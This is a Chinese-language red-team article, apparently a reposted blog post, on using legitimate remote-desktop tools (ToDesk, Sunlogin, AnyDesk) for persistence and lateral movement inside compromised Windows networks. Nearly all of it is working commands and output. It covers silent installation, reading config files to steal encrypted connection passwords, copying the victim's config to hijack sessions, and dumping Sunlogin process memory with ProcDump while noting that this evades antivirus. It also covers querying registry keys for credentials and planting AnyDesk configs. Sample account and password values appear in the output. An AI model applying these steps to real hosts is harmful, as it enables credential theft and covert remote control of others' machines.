文章总结： 本文详解内网渗透中利用ToDesk、向日葵及AnyDesk等合法远控获取凭证的技术。核心包括读取配置文件、利用ProcDump内存dump及注册表查询解密。针对不同版本软件提供了操作命令与工具推荐，为红队人员提供了实用的权限维持与横向移动方案。 综合评分： 91 文章分类： 内网渗透,红队,渗透测试

掌握内网远控核心技能：Windows图形化远程控制全攻略

原创

沐青序 沐青序

数字序言

2026年1月29日 08:37 福建

免责声明：本公众号内容仅供网络安全技术学习与合法研究，严禁用于非法用途。使用者须遵守法律法规，因非法使用造成的全部后果自行承担。本公众号及作者不对内容准确性作保证，不承担因此产生的任何损失。如涉及侵权，烦请告知，核实后将立即处理。感谢理解。

ToDesk

ToDesk_Lite

官方最新下载地址：

https://dl.todesk.com/windows/ToDesk_Lite.exe

利用powershell建立http连接下载todesk_lite.exe

PS C:\Users\Administrator\Desktop> powershell.exe -c Invoke-WebRequest -Uri "https://dl.todesk.com/windows/ToDesk_Lite.exe" -OutFile "todesk_lite.exe"

打开todesk_lite.exe以后通过type读取默认路径的配置文件

PS C:\Users\Administrator\Desktop> .\todesk_lite.exe
PS C:\Users\Administrator\Desktop> type C:\ProgramData\ToDesk_Lite\config.ini
[ConfigInfo]
passUpdate=3
PrivateScreenLockScreen=1
autoLockScreen=1
downloadtimes=202406020
clientId=228209154
PrivateData=6147d6c6ef82a52c5f77f99f8996ec0f777df10d8114692f8cf2a37b826078fc8f09e407d88788af92c468e26dcf676eee153d2f04fec1d3a3
PluginExpiresDays=0
tempAuthPassEx=98ee5e197dc63ee7a157681ea67bcf29dc7f99510dc147ef4a65b6d08ebe3db20fc9f7881cb04972ae73009bf2d54d97bbeb2d4751a82b38
updatePassTime=20240602
language=936

PS：Todesk_lite在每次连接完后，会自动重置连接密码

ToDesk正常程序

官方最新下载地址：

https://dl.todesk.com/windows/ToDesk.exe

# 命令行方式下载ToDesk.exe【也可以自行上传】
PS C:\Users\Administrator\Desktop> powershell.exe -c Invoke-WebRequest -Uri "https://dl.todesk.com/windows/ToDesk.exe" -OutFile "ToDesk.exe"

# 静默安装，所有选项均是默认的（不过对方桌面还是会弹窗，最后一步还是需要手动确认）
PS C:\Users\Administrator\Desktop> ToDesk.exe /S

# 通过powershell的Get-Content命令读ToDesk默认路径下的配置文件(实际情况需更改)
PS C:\Users\Administrator\Desktop> Get-Content "C:\Program Files\ToDesk\config.ini"
C:\Users\Administrator\Desktop>powershell.exe
Windows PowerShell
版权所有（C） Microsoft Corporation。保留所有权利。

安装最新的 PowerShell，了解新功能和改进！https://aka.ms/PSWindows

PS C:\Users\Administrator\Desktop> Get-Content "C:\Program Files\ToDesk\config.ini"
[ConfigInfo]
passUpdate=2
PrivateScreenLockScreen=1
autoLockScreen=0
downloadtimes=202406020
clientId=228209154
PrivateData=93c3c9f15da3175ea6683a3e7ee96bc038b3aaf8354ee50d09f8ad120e901cd4ee5d93f150f9dc5783d81ec9d04bc45a656ccce653cb5d4139
Resolution=1920x1080
isOpenTempPass=0
updatePassTime=20240602223958
language=936
isAdmissionControl=1
WeakPasswordTip=0
Version=4.7.2.1
isUpdate=0
tempAuthPassEx=3726bdbc835293e4915d9d802bb481ec5c30b38b6e4621268677e9c4d3d354b1d3f2832a7f265137f61c8784744ffbd5263a62aa79edfd6a
PresetDialogUpdateDate=2024-06-02
PresetDialogShowCount=0
UpdateFrequencyPromptBubble=0
AuthMode=1
UpdateTempPassDefault=1
LastPushTimeEx=20240602
authPassEx=1ee9acec86edb2aca5a9d854b6d50053c27e058678c2eef82ad5e62aa52e049aade553f0e020b2e34cf88d08319f2eed2f49b211a2c66c3ac1
PS C:\Users\Administrator\Desktop>

# 配置文件中
tempAuthPassEx为临时密码
authPassEx为安全密码

获取ToDesk的连接信息

被控端ToDesk：设备代码:228 209 154、临时密码:hv0rhkt5

主控端ToDesk：设备代码:620 499 635、临时密码:gcz80etk

我们将被控端ToDesk的config.ini的内容复制出来，张贴到主控端的config.ini下即可现实临时密码的替换(设备代码在配置文件中，我们本地自己主控端的不会被替换掉)，对没错，就这么简单

主控端替换配置文件后的效果

查看Todesk进程

# 通过执行 tasklist 查看当前系统是否有Todesk.exe进程
PS C:\Users\Administrator\Desktop> tasklist | Select-String -Pattern "ToDesk.exe"

# 有的话执行下方语句，获取进程运行路径
PS C:\Users\Administrator\Desktop> wmic process where "name='ToDesk.exe'" get processid,executablepath,name

工具

📎GhostWolf.zip

向日葵

最新版

官方最新下载地址：

https://d.oray.com/sunlogin/windows/SunloginClient_15.6.0.64434_x64.exe

向日葵强化了加密机制，将config中的信息写入到内存中

# 查看向日葵进程信息
PS C:\Users\Administrator\Desktop> tasklist /v | findstr /i sunlogin

# 通过procdump工具将指定内存中的密码信息dump下来
procdump64.exe -accepteula -ma 进程号
PS：进程号一般选当前用户的SunloginClient.exe进程

PS C:\Users\Administrator\Desktop\Procdump> .\procdump64.exe -accepteula -ma 4276

微软的ProcDump，可直接过免杀

https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

然后将dump出来的内存数据放入winhex进行查找

在winhex中按住 ctrl+alt+x （查询十六进制数据）
查找下方数据：79616865692E323820633D636F6C6F725F65646974203E

比较新的版本

在向日葵v11.1.2.38529 后，强化了加密机制，删除了配置文件 config.ini 中 的 fastcode （本机识别码）字 段 和 encry_pwd  (本机验证码)字段，而将这些敏感信息放到了注册表中（以下为一条正常安装，一条便携版），我们可以通过注册表查询使用 Sunflower_get_Password 工具即可解密。

reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo
reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo

一款针对部分向日葵的识别码和验证码提取工具

https://github.com/wafinfo/Sunflower_get_Password?ref=pythonrepo.com

老版本

老版本的识别码和密码等，可直接读取配置文件

PS：老版本目前很难找了，就算找到了相应的应用安装也会出现各种问题，市面上已经没什么人用了。

# 安装版
C:\Program Files\Oray\SunLogin\SunloginClient\config.ini

# 便携版
C:\ProgramData\Oray\SunloginClient\config.ini

# 还有的一些杂的本版
C:\Users\Administrator\AppData\Roaming\Oray\SunloginRemote\config.ini

只有控制端

[base]
autorun=0
screenshots_path=C:\Users\Administrator\Documents\Oray\SunloginRemote
log_path=C:\Users\Administrator\AppData\Roaming\Oray\SunloginRemote\log
show_new_function=0
agent_type=0
skin=h9KQ1JLr/20=
account=17359491968
password=mwp+9HJkW1HANucZyB3HEQ==
autologin=1
slapiaddress=slapi.oray.net
hostimage=0
updatemodel=0
show_guide_download_dlg=0
show_banner_time=
show_banner=1
not_show_drag_tip=1

[account_record]
17359491968=mwp+9HJkW1HANucZyB3HEQ==

GotoHttp

https://gotohttp.com/

被控端

浏览器控制端

Anydesk

https://anydesk.com/zht

控制演示

powershell下载

powershell.exe (New-Object System.Net.WebClient).DownloadFile(“https://download.anydesk.com/AnyDesk.exe","C:\anydesk.exe")

获取配置文件等

通过先在本机生成的一个配置文件(注意设置好自己的密码，配置文件包括：ad.trace、service.conf、system.conf、user.conf)，然后将配置文件拷贝替换到对方主机的对应文件夹下。

主要的配置文件包括：ad.trace、service.conf、system.conf、user.conf

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：数字序言 沐青序 沐青序《掌握内网远控核心技能：Windows图形化远程控制全攻略》